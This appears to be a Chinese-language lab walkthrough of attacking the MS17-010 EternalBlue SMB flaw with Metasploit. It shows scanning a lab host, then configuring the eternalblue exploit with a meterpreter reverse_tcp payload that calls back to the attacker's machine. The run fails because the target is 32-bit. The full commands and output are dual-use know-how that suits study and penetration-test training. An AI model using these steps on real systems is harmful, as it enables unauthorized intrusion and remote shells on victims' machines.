MSF练习 - 永恒之蓝
msfconsole
┌──(root㉿kali)-[~]
└─# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.2.36-dev ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use sessions -1 to interact with the
last opened session
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
二、搜索ms17_010
search ms17_010
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
三、使用模块扫描
使用smb_ms17_010模块扫描,该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试。
use auxiliary/scanner/smb/smb_ms17_010
查看模块需要配置的参数
show options
右边Required为yes的选项说明左边 Current Setting 这个项对应的需要填写,比如Rhoststs
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/da yes List of named pipes to check
ta/wordlists/named_pipes.txt
RHOSTS 192.168.11.132 yes The target host(s), see https://github.com/rapid7/metasploit-f
ramework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
设置攻击目标
RHOSTS 参数是要探测主机的ip或ip范围,比如 192.168.11.125-129.168.11.130 或者 192.168.11.0/24
set rhosts 192.168.11.132
再次查看配置参数
show options
执行扫描,显示主机很可能能够会受到永恒之蓝漏洞的攻击
run
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.11.132:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.11.132:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
四、攻击
使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
查看这个漏洞的信息
info
查看可攻击的系统平台,这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统
注:如果不设置,MSF会自动判断目标操作系统的版本和语言(利用目标系统的指纹特征)
show targets
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
查看攻击载荷(该命令可以查看当前漏洞利用模块下可用的所有Payload)
注:攻击载荷是期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令。
show payloads
设置攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
查看配置参数
show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
ng-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows S
erver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Serve
r 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2,
Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.11.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
设置目标攻击ip
注:多个攻击目标ip间直接用空格隔开
set rhosts 192.168.11.132
设置用于接收从目标机弹回来的shell
set LHOST 192.168.11.128
注:exploit和run都可以执行
run
执行攻击,这里靶机攻击失败=_=
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.11.128:4444
[*] 192.168.11.132:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.11.132:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.11.132:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.11.132:445 - The target is vulnerable.
[-] 192.168.11.132:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
